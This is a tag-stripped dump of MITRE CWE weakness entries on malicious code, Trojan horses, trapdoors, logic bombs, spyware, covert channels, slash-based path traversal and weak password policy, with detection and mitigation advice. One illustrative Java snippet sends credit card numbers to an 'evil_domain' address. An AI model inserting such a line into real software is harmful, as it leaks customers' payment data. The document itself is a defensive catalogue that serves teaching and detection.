MITRE + 2020-02-24 + updated Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Alternate_Terms, Potential_Mitigations + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + + + The product contains code that appears to be malicious in nature. + Malicious flaws have acquired colorful names, including Trojan horse, trapdoor, timebomb, and logic-bomb. A developer might insert malicious code with the intent to subvert the security of a product or its host system at some time in the future. It generally refers to a program that performs a useful service but exploits rights of the program's user in a way the user does not intend. + + + + + + Implementation + + + Bundling + + + Distribution + + + Installation + + + + + Confidentiality + Integrity + Availability + Execute Unauthorized Code or Commands + + + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + Generated Code Inspection + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Automated Monitored Execution + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Manual Source Code Review (not inspections) + + + + SOAR Partial + + + Automated Static Analysis + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Origin Analysis + + + + SOAR Partial + + + + + Testing + Remove the malicious code and start an effort to ensure that no more malicious code exists. This may require a detailed review of all code, as it is possible to hide a serious attack in only one or two lines of code. These lines may be located almost anywhere in an application and may have been intentionally obfuscated by the attacker. + + + + + In the example below, a malicous developer has injected code to send credit card numbers to the developer's own email address. + + boolean authorizeCard(String ccn) { + + + // Authorize credit card. + + + ... + + mailCardNumber(ccn, "evil_developer@evil_domain.com"); + } + + + + + + Malicious + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + The term "Trojan horse" was introduced by Dan Edwards and recorded by James Anderson [18] to characterize a particular computer security threat; it has been redefined many times [4,18-20]. + + + + Landwehr + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2010-09-27 + updated Other_Notes, Terminology_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Malicious + + + + The product appears to contain benign or useful functionality, but it also contains code that is hidden from normal operation that violates the intended security policy of the user or the system administrator. + + + + + + Implementation + + + Operation + + + + + Confidentiality + Integrity + Availability + Execute Unauthorized Code or Commands + + + + + Operation + Most antivirus software scans for Trojan Horses. + + + Installation + Verify the integrity of the product that is being installed. + + + + + Trojan Horse + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Potentially malicious dynamic code compiled at runtime can conceal any number of attacks that will not appear in the baseline. The use of dynamically compiled code could also allow the injection of attacks on post-deployed applications. + + Definitions of "Trojan horse" and related terms have varied widely over the years, but common usage in 2008 generally refers to software that performs a legitimate function, but also contains malicious code. + Almost any malicious code can be called a Trojan horse, since the author of malicious code needs to disguise it somehow so that it will be invoked by a nonmalicious user (unless the author means also to invoke the code, in which case they presumably already possess the authorization to perform the intended sabotage). A Trojan horse that replicates itself by copying its code into other program files (see case MA1) is commonly referred to as a virus. One that replicates itself by creating new processes or files to contain its code, instead of modifying existing storage entities, is often called a worm. Denning provides a general discussion of these terms; differences of opinion about the term applicable to a particular flaw or its exploitations sometimes occur. + + + + + Landwehr + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Terminology_Notes + + + CWE Content Team + MITRE + 2010-02-16 + updated References + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated References, Terminology_Notes + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Non-replicating malicious code only resides on the target system or product that is attacked; it does not attempt to spread to other systems. + + + + + + Implementation + + + Operation + + + + + Confidentiality + Integrity + Availability + Execute Unauthorized Code or Commands + + + + + Operation + Antivirus software can help mitigate known malicious code. + + + Installation + Verify the integrity of the software that is being installed. + + + + + Non-Replicating + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Landwehr + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Non-Replicating + + + + Replicating malicious code, including viruses and worms, will attempt to attack other systems once it has successfully compromised the target system or the product. + + + + + + Implementation + + + Operation + + + + + Confidentiality + Integrity + Availability + Execute Unauthorized Code or Commands + + + + + Operation + Antivirus software scans for viruses or worms. + + + Installation + Always verify the integrity of the software that is being installed. + + + + + Replicating (virus) + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Landwehr + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Replicating (virus) + Replicating Malicious Code (virus) + + + + The product accepts path input in the form of multiple internal slash ('/multiple//internal/slash/') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2002-1483 + Read files with full pathname using multiple internal slash. + https://www.cve.org/CVERecord?id=CVE-2002-1483 + + + + + /multiple//internal/slash ('multiple internal slash') + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Multiple Internal Slash - /multiple//internal/slash + + + + A trapdoor is a hidden piece of code that responds to a special input, allowing its user access to resources without passing through the normal security enforcement mechanism. + + + + + + Architecture and Design + + + Implementation + + + Operation + + + + + Confidentiality + Integrity + Availability + Access Control + Execute Unauthorized Code or Commands + Bypass Protection Mechanism + + + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Inter-application Flow Analysis + Binary / Bytecode simple extractor - strings, ELF readers, etc. + + + + SOAR Partial + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + Generated Code Inspection + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Automated Monitored Execution + Forced Path Execution + Debugger + Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Manual Source Code Review (not inspections) + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Context-configured Source Code Weakness Analyzer + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + Cost effective for partial coverage: + + Formal Methods / Correct-By-Construction + + + + High + + + + + Installation + Always verify the integrity of the software that is being installed. + + + Testing + Identify and closely inspect the conditions for entering privileged areas of the code, especially those related to authentication, process invocation, and network communications. + + + + + Trapdoor + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Landwehr + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product contains code that is designed to disrupt the legitimate operation of the product (or its environment) when a certain time passes, or when a certain logical condition is met. + When the time bomb or logic bomb is detonated, it may perform a denial of service such as crashing the system, deleting critical data, or degrading system response time. This bomb might be placed within either a replicating or non-replicating Trojan horse. + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Other + Integrity + Varies by Context + Alter Execution Logic + + + + + Installation + Always verify the integrity of the product that is being installed. + + + Testing + Conduct a code coverage analysis using live testing, then closely inspect any code that is not covered. + + + + + Typical examples of triggers include system date or time mechanisms, random number generators, and counters that wait for an opportunity to launch their payload. When triggered, a time-bomb may deny service by crashing the system, deleting files, or degrading system response-time. + + + + + Logic/Time Bomb + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Landwehr + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Applicable_Platforms, Potential_Mitigations, References, Time_of_Introduction + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product collects personally identifiable information about a human user or the user's activities, but the product accesses this information using other resources besides itself, and it does not require that user's explicit approval or direct input into the product. + "Spyware" is a commonly used term with many definitions and interpretations. In general, it is meant to refer to products that collect information or install functionality that human users might not allow if they were fully aware of the actions being taken by the software. For example, a user might expect that tax software would collect a social security number and include it when filing a tax return, but that same user would not expect gaming software to obtain the social security number from that tax software's data. + + + + + + Architecture and Design + + + Implementation + + + Operation + + + + + Confidentiality + Read Application Data + + + + + Operation + Use spyware detection and removal software. + + + Installation + Always verify the integrity of the product that is being installed. + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A covert channel is a path that can be used to transfer information in a way not intended by the system's designers. + Typically the system has not given authorization for the transmission and has no knowledge of its occurrence. + + + + + + Implementation + + + Operation + + + + + Confidentiality + Access Control + Read Application Data + Bypass Protection Mechanism + + + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + SOAR Partial + + + + + Covert Channel + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + A covert channel can be thought of as an emergent resource, meaning that it was not an originally intended resource, however it exists due the application's behaviors. + As of CWE 4.9, members of the CWE Hardware SIG are working to improve CWE's coverage of transient execution weaknesses, which include issues related to Spectre, Meltdown, and other attacks that create or exploit covert channels. As a result of that work, this entry might change in CWE 4.10. + + + + Landwehr + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Other_Notes, Theoretical_Notes + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Description, Relationships, Theoretical_Notes + + + CWE Content Team + MITRE + 2014-06-23 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A covert storage channel transfers information through the setting of bits by one program and the reading of those bits by another. What distinguishes this case from that of ordinary operation is that the bits are used to convey encoded information. + Covert storage channels occur when out-of-band data is stored in messages for the purpose of memory reuse. Covert channels are frequently classified as either storage or timing channels. Examples would include using a file intended to hold only audit information to convey user passwords--using the name of a file or perhaps status bits associated with it that can be read by all users to signal the contents of the file. Steganography, concealing information in such a manner that no one but the intended recipient knows of the existence of the message, is a good example of a covert storage channel. + + + + + + Implementation + + + High + + + Confidentiality + Read Application Data + Covert storage channels may provide attackers with important information about the system in question. + + + Integrity + Confidentiality + Read Application Data + If these messages or packets are sent with unnecessary data contained within, it may tip off malicious listeners as to the process that created the message. With this information, attackers may learn any number of things, including the hardware platform, operating system, or algorithms used by the sender. This information can be of significant value to the user in launching further attacks. + + + + + Implementation + Ensure that all reserved fields are set to zero before messages are sent and that no unnecessary information is included. + + + + + An excellent example of covert storage channels in a well known application is the ICMP error message echoing functionality. Due to ambiguities in the ICMP RFC, many IP implementations use the memory within the packet for storage or calculation. For this reason, certain fields of certain packets -- such as ICMP error packets which echo back parts of received messages -- may contain flaws or extra information which betrays information about the identity of the target operating system. This information is then used to build up evidence to decide the environment of the target. This is the first crucial step in determining if a given system is vulnerable to a particular flaw and what changes must be made to malicious code to mount a successful attack. + + + + + Storage + + + Covert storage channel + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + As of CWE 4.9, members of the CWE Hardware SIG are working to improve CWE's coverage of transient execution weaknesses, which include issues related to Spectre, Meltdown, and other attacks that create or exploit covert channels. As a result of that work, this entry might change in CWE 4.10. + + + + Landwehr + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-07-27 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This weakness can be found at CWE-385. + + Prohibited + This CWE has been deprecated. + See description and name for possible suggestions of other CWEs to consider. + + + + + + + Landwehr + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Name + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + DEPRECATED (Duplicate): Covert Timing Channel + + + + The product accepts path input in the form of multiple trailing slash ('/multiple/trailing/slash//') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. + + + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2002-1078 + Directory listings in web server using multiple trailing slash + https://www.cve.org/CVERecord?id=CVE-2002-1078 + + + + + /multiple/trailing/slash// ('multiple trailing slash') + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Multiple Trailing Slash - /multiple/trailing/slash// + + + + Allowing a .NET application to run at potentially escalated levels of access to the underlying operating and file systems can be dangerous and result in various forms of attacks. + .NET server applications can optionally execute using the identity of the user authenticated to the client. The intention of this functionality is to bypass authentication and access control checks within the .NET application code. Authentication is done by the underlying web server (Microsoft Internet Information Service IIS), which passes the authenticated token, or unauthenticated anonymous token, to the .NET application. Using the token to impersonate the client, the application then relies on the settings within the NTFS directories and files to control access. Impersonation enables the application, on the server running the .NET application, to both execute code and access resources in the context of the authenticated and authorized user. + + + + + + Architecture and Design + + + Implementation + + + Operation + + + + + Access Control + Gain Privileges or Assume Identity + + + + + Operation + Run the application with limited privilege to the underlying operating and file system. + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + .NET Misconfiguration: Impersonation + + + + The product does not require that users should have strong passwords, which makes it easier for attackers to compromise user accounts. + Authentication mechanisms often rely on a memorized secret (also known as a password) to provide an assertion of identity for a user of a system. It is therefore important that this password be of sufficient complexity and impractical for an adversary to guess. The specific requirements around how complex a password needs to be depends on the type of system being protected. Selecting the correct password requirements and enforcing them through implementation are critical to the overall success of the authentication mechanism. + + + + + + + + + + + Architecture and Design + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + Implementation + Not enforcing the password policy stated in a products design can allow users to create passwords that do not provide the necessary level of protection. + + + + + Access Control + Gain Privileges or Assume Identity + An attacker could easily guess user passwords and gain access user accounts. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + + A product's design should require adherance to an appropriate password policy. Specific password requirements depend strongly on contextual factors, but it is recommended to contain the following attributes: + + Enforcement of a minimum and maximum length + Restrictions against password reuse + Restrictions against using common passwords + Restrictions against using contextual string in the password (e.g., user id, app name) + + Depending on the threat model, the password policy may include several additional attributes. + + Complex passwords requiring mixed character sets (alpha, numeric, special, mixed case) + + Increasing the range of characters makes the password harder to crack and may be appropriate for systems relying on single factor authentication. + Unfortunately, a complex password may be difficult to memorize, encouraging a user to select a short password or to incorrectly manage the password (write it down). + Another disadvantage of this approach is that it often does not result in a significant increases in overal password complexity due to people's predictable usage of various symbols. + + + Large Minimum Length (encouraging passphrases instead of passwords) + + Increasing the number of characters makes the password harder to crack and may be appropriate for systems relying on single factor authentication. + A disadvantage of this approach is that selecting a good passphrase is not easy and poor passwords can still be generated. Some prompting may be needed to encourage long un-predictable passwords. + + + Randomly Chosen Secrets + + Generating a password for the user can help make sure that length and complexity requirements are met, and can result in secure passwords being used. + A disadvantage of this approach is that the resulting password or passpharse may be too difficult to memorize, encouraging them to be written down. + + + Password Expiration + + Requiring a periodic password change can reduce the time window that an adversary has to crack a password, while also limiting the damage caused by password exposures at other locations. + Password expiration may be a good mitigating technique when long complex passwords are not desired. + + + + See NIST 800-63B [REF-1053] for further information on password requirements. + + + + Architecture and Design + Consider a second + authentication factor beyond the password, which prevents the + password from being a single point of failure. See CWE-308 for + further information. + + + Implementation + Consider implementing a password complexity meter to inform users when a chosen password meets the required attributes. + + + + + CVE-2020-4574 + key server application does not require strong passwords + https://www.cve.org/CVERecord?id=CVE-2020-4574 + + + + + A3 + Broken Authentication and Session Management + CWE More Specific + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE 